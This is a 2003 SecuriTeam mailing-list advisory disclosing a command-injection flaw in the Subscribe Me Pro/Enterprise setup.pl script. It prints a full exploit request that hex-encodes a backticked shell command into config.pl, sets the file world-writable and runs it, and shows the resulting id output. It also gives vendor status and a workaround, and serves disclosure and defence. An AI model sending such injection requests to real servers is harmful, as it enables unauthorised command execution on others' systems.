[UNIX] Subscribe Me Pro/Enterprise Command Execution

From: SecuriTeam (support_at_securiteam.com)
Date: 12/22/03

  • Next message: SecuriTeam: "[EXPL] DameWare Mini Remote Control Server Overflow Exploit" 
    To: list@securiteam.com
Date: 22 Dec 2003 12:10:11 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Subscribe Me Pro/Enterprise Command Execution
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.siteinteractive.com> Subscribe Me Pro/Enterprise is "a
    mailing list management script developed by siteinteractive". Various
    flaws exist in setup.pl that can allow an attacker to inject shell
    commands using a back ticked variable injection flaw into config.pl, and
    then exploiting a permission problem to execute config.pl.

    DETAILS

    Exploit:
    This attack tricks the perl script setup.pl into thinking that you have
    just installed Subscribe Me and wish to set it up. When doing this
    setup.pl will attempt to write all your configuration variables to
    config.pl. There is some input validation done in setup.pl, but this can
    be easily bypassed by hex encoding all data that you send.

    Run though of the exploit:
    First we connect and inject our exploit command of '/usr/bin/id > id' and
    tell setup.pl to create all files with a mode of 777.
    http://victim.com/cgi-bin/setup.pl?RUNINSTALLATION=yes&information=~&extension=pl
    &config=pl&permissions=777&os=notunixornt&perlpath=/usr/bin/perl&mailprog=/bin/sh
    &notification="%20.`%2F%75%73%72%2F%62%69%6E%2F%69%64%20%3E%20%69%64`
    %20."&websiteurl=evilhacker&br_username=evilhacker&session_id=0&cgipath=.

    This will return a page saying, "Please set your administration password"
    (you will not be able to).

    This has now written the following data to config.pl
    $notification = "" .`/usr/bin/id > id` . ""; (note the back ticks)

    Moreover, config.pl is now set to -rwxrwxrwx. Now we request
    http://victim.com/cgi-bin/config.pl to execute our perl.

    And respectively http://victim.com/cgi-bin/id is now created and contains:
    uid=48(apache) gid=48(apache) groups=48(apache)

    Using this exploit, it is possible to inject any system commands.

    Vendor status:
    Company was contacted via email (support@) on Monday 15 December, they
    were notified that the exploit would be released on 19 December, and they
    were told how to fix the problem. No reply was heard back from the
    company, and no official fix has been released.

    Workaround:
    Remove setup.pl once installed, in addition chmod config.pl to read only.

    ADDITIONAL INFORMATION

    This advisory is also online at:
    <http://www.pimp-industries.com/advsiory-0003.txt>
    http://www.pimp-industries.com/advsiory-0003.txt.

    The information has been provided by
    <mailto:headpimp@pimp-industries.com> Paul Craig - Pimp Industries.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[EXPL] DameWare Mini Remote Control Server Overflow Exploit"

    Relevant Pages